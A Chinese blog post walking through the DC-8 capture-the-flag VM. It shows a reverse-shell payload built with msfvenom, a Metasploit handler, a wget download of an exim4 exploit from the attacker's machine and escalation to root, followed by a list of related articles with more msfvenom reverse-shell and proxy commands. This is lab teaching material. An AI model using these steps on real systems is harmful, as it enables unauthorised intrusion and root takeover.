关于DC8用MSF进行反向链接的一些说明

最新推荐文章于 2024-11-19 23:32:30 发布
最新推荐文章于 2024-11-19 23:32:30 发布
阅读量523 收藏 10
点赞数 9
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_57774303/article/details/135333057
版权
本文讲述了如何使用MetasploitFramework(MSF)生成的反向链接在Web服务器上实施攻击,包括PHP代码上传、木马后门、提权到exim4文件夹并利用其漏洞,最终通过wget在KaliLinux上执行命令并获取root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

上星期五的时候得了甲流,关于MSF反向链接的地方没有写明白

现在重新写一下

当时我们用msfvenom生成了反向链接的代码

如图所示

注意这个生成的后门我们的lhost地址是我们kali攻击机的地址,

然后将这个代码复制到网页上传点的的时候休要注意可以上传的是不是PHP的代码

必须是PHP代码能够上传才行

然后进入msf进行连接的时候

需要先进入辅助模块

use multi/hander

辅助模块,

然后指定的链接lhost地址也是kall攻击机的地址

set lhost为192.168.52.129

然后记得在网页上登陆账号才能把木马后门上传

然后木马后门链接成功进行反弹

输入shell进行shell的指令

然后进入shell指令界面

输入id可以看到

是www-date

输入常用提权指令

用find / -user root

然后我们发现这有一个文件夹叫做 exim4

他是一个电子邮件 但是它具有管理员权限

让我们观察一下

这个的版本号 

然后我们可以通过searchsplot工具去搜索这个版本的漏洞

发现存在漏洞

让我们把这个病毒的路径调出来

然后复制一份放到桌面上

让我们查找一下这个漏洞的利用路径

复制成功

这时候我们在kali攻击机上启动一个临时的http链接窗口

将文件上传上去

切记 只有进入/tmp目录才上传文件

用wegt

输入方式为为 /tmp wget http:、、192.168.52.129:80、46996.sh

如图所示为连接上传成功

查看权限

查看上传文件的用法

我们将使用第二种提权用法

进入root权限了

切换到 /roort目录自己看就行了

靶机DC-8(详细渗透,适合新手渗透)
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
在阿一网络安全学院练习红日靶场之通过MSF和CS上线PC机器
Ayixy的博客
06-11 435
直接去目标机器执行了一下木马,是可以上线的,也许真实场景可以想办法的钓鱼让目标主动点击。若目标机器无法出网,就得让同处于内网的跳板机,采取正向或者反向连接的方式进行上线了。已知开放了这些端口,且我们拥有域控密码信息,尝试另外一种上线方式,让跳板机。可以直接在跳板机上新建监听,然后转发上线,但生成的木马免杀有点难操作。没有拿下,这台机器开了防火墙,直接通过。进行内网信息收集,得知域控机器。,并设置定时任务运行,从而上线。进程上,无法成功,遂找了个。,但这样操作的前提是建立在。通过之前抓取的密码,建立。
使用MSF反向反弹shell
weixin_45588247的博客
07-20 5205
实验准备: 攻击(攻击者)主机: kali 2020.2 虚拟机 nat 192.168.254.132 反向反弹: 【步骤一】:msfconsole启动,结果如【图1】所示: 【命令】 msfconsole 一、msfconsole(这种没有启用数据库,搜索某些东西会很慢) 二、数据...
内网的MSF接收反向shell
m0_46736332的博客
10-27 3327
内网虚拟机MSF接收外网以及不同局域网机器的反向shell
mariadb php无法连接_weevely生成木马反向连接msf
weixin_39616090的博客
11-23 462
一位苦于信息安全的萌新小白帽本实验仅用于信息防御教学,切勿用于它用途公众号:XG小刚小实验目的今天使用一下kali系统下的中国菜刀weevely,生成木马文件、混淆木马文件控制Web服务器,并进一步反弹shell给metasploit做进一步控制。实验环境VM搭建的虚拟测试环境1.phpstudy搭建主机 192.168.1.12.kali 192.168.1.128Weevely...
内网:正向连接与反向连接
尘玥的故事
03-11 1721
反向连接是控制主机监听一个端口,由受害主机反向去连接控制主机的过程,适用于受害主机出网(或出网且没有公网ip)的情况。例如,受害主机是一台位于内网,并且没有公网ip且能访问互联网的主机,控制主机无法直接通过ip地址访问到受害主机。例如下面,受害主机具有公网ip,被控主机kali可以通过ip地址访问到受害主机,所以能够使用正相连接来控制受害主机。正向连接是受害主机监听一个端口,由控制主机主动去连接受害主机的过程,适用于受害主机具有。由于正向连接是被攻击者主动连接攻击者,所以不受防火墙策略的限制。
内网安全:代理技术详解
qq_61553520的博客
06-03 9958
本篇将介绍在内网攻防中经常用到的代理技术,正向连接,反向连接。
靶机DC-1练习:借助msfconsole进行漏洞查询利用getshell后,采用suid提权
7Riven's blog
12-10 2637
1.靶机IP地址发现 2.查看靶机版本和服务 -sV:用来扫描目标主机和端口上运行的软件的版本 -p-:扫描0-65535全部端口 -sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描 -Pn:选项指示NMAP跳过默认的发现检查并对执行对目标的完整端口扫描。当扫描被阻止ping探针的防火...
shell的正向和反向
qq_46258964的博客
02-05 9076
正向shell和反向shell 正向shell:控制端主动发起连接去连接被控制端 反向shell:被控制端主动连接控制端 在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败, 比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。 反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。 反向shell如下 Linux常见反向shell bash反弹shell nc -lvp
DC系列打穿靶机】DC-1靶机妈生教程!
m0_53419560的博客
11-19 1138
声明:该笔记为up主的课程笔记,本节链接。警告:本教程仅作学习用途,若有用于非法行为的,概不负责。
利用msf工具制作反向木马渗透
qq_61415450的博客
04-29 385
利用msf工具制作反向木马渗透
使用Msfvenom生成Ubuntu 64位木马(反向连接、正向连接)
zhang35的博客
04-20 1万+
环境 攻击机:Kali Linux 2020.1 172.16.252.129 靶机:Ubuntu 16.04 172.16.252.138 生成木马 使用kali自带的Msfvenom工具生成木马。 查看有哪些linux下的载荷: msfvenom -l payloads | grep linux 针对Ubuntu 64位靶机,使用linux/x64/meterpreter/reverse_t...
网络安全 - Kali Linux反向端口连接&免杀
weixin_34307464的博客
06-09 992
本篇文章适用学习,维护网络安全,做合法公民 介绍:之前使用 小七免杀工具包 来作免杀(有空我就上传到网盘),免杀就是对PE(.bat、.exe等)文件中出现的特征码进行替换修改,方法有等价替换指令,字符串修改大小写、互补等。 如今开源的东西比起手工来做,不仅免杀率高,速度快,功能多,而且会长期维护。下面我就介绍下 Hercules 工具:...
msf之正向shell的使用
shy的博客
09-28 1万+
场景:经常使用msf生成后门文件获取shell,但是经常使用的都是反弹shell,reverse_tcp。突然之间遇到了一个场景,由于目标服务器不能出网,只能使用正向shell,这时才发现,自己对于正向shell,一无所知。 1,生成正向shell后门文件 msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe 2,上传到目标机器上 3.配置监听(很重要) 4,运行目标机上的后门文件,获取shell 1,2是正向sh.
MSF生成一个木马与使用
热门推荐
lx1315998513的博客
03-27 1万+
原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用测试机打开,攻击成功后,就渗透到了靶机系统中。 准备: 目标:win7 x64专业版 攻击主机:Kali IP:192.168.1.143 生成: 生成test.exe木马文件 Step1:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1...
msfvenome木马生成的实战及其文档翻译(kali-01)
进击的小小白
05-31 2696
MSFVENOM(1) Metasploit Framework - msfvenom MSFVENOM(1) NAME msfvenom - Payload Generator and Encoder SYNOPSIS msfvenom [options] <var=val> DESCRIPT...
使用msf进行反弹shell+内网渗透
JSMaster01的博客
12-30 1万+
首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令 反弹shell的原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。 一、反弹shell: 1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfveno...
关于ARP欺骗与MITM(中间人攻击)的一些笔记( 二 )
weixin_30627381的博客
08-03 474
一直没有折腾啥东西,直到最近kali Linux发布,才回想起应该更新博客了…..再次说明,这些技术并不是本人原创的,而是以前记录在Evernote的旧内容(排版不是很好,请谅解),本文是继关于ARP欺骗与MITM(中间人攻击)的一些笔记(一)的继续,目前在Kali Linux下重新整理并放上博客,在这篇笔记中将会有以下内容:1.ettercap插件使用(局域网内DNS欺骗举例)2.etter...
Metasploit-payload(攻击载荷)
y@n1n的博客
03-05 1375
payload模块的类型:Single、Stager、Stage。 singles(独立载荷) Single是一种完全独立的Payload,而且使用起来就像运行 calc.exe 一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似 netcat 这样的非metasploit处理工具所捕捉到。 stagers(传输器载荷) Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stage.
msf挂代理反向连接
最新发布
01-04
### 配置Metasploit Framework (MSF) 使用代理实现反向连接 为了使 Metasploit Framework 能够通过代理执行反向连接,需调整 payload 设置并配置 MSF 的网络选项。具体方法如下: #### 1. 创建带有代理设置的有效负载 当创建用于反向连接的有效负载时,在 `msfvenom` 中加入 HTTP 或 SOCKS5 代理参数。 对于 Java Web 应用程序(WAR 文件),可使用以下命令来生成经过代理转发的 Payload[^3]: ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your_IP_Address> LPORT=<Your_Port_to_Connect_On> Proxies=http://<Proxy_Host>:<Proxy_Port>/ -f war > shell.war ``` 此命令指定了一个 HTTP 代理服务器地址作为中间节点,有效负载将尝试经由该代理建立回连通道。 #### 2. 在 Metasploit 控制台内启用代理支持 启动 Metasploit 并进入控制台环境后,可以通过设定全局变量或特定模块选项的方式开启代理功能[^4]: ```ruby setg http_proxy http://<Proxy_Host>:<Proxy_Port> setg https_proxy http://<Proxy_Host>:<Proxy_Port> ``` 上述指令设置了整个框架层面的 HTTP(S) 请求都将被路由至指定的代理服务器上处理。 针对具体的 exploit 模块,则可以在加载之后单独为其应用代理规则: ```ruby use multi/handler set PAYLOAD windows/meterpreter/reverse_http set LHOST <Your_IP_Address> set LPORT <Your_Listening_Port> set ReverseListenerBindAddress <Local_Bind_Address_for_Proxy> set HttpUsername <Optional_HTTP_Auth_Username> set HttpPassword <Optional_HTTP_Auth_Password> exploit -j -z ``` 这里特别注意的是 `ReverseListenerBindAddress` 参数,它决定了监听器绑定本地哪个网卡接口等待来自代理的数据包;而 `HttpUsername` 和 `HttpPassword` 则是在所使用的代理需要身份验证的情况下才需填写。 #### 3. 处理防火墙和安全设备过滤 考虑到企业级环境中常见的网络安全防护措施,建议选用具备一定隐蔽性的传输协议如 HTTPS/TLS 来封装通信流量,并考虑采用 Metasploit 提供的各种规避技术以提高成功率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值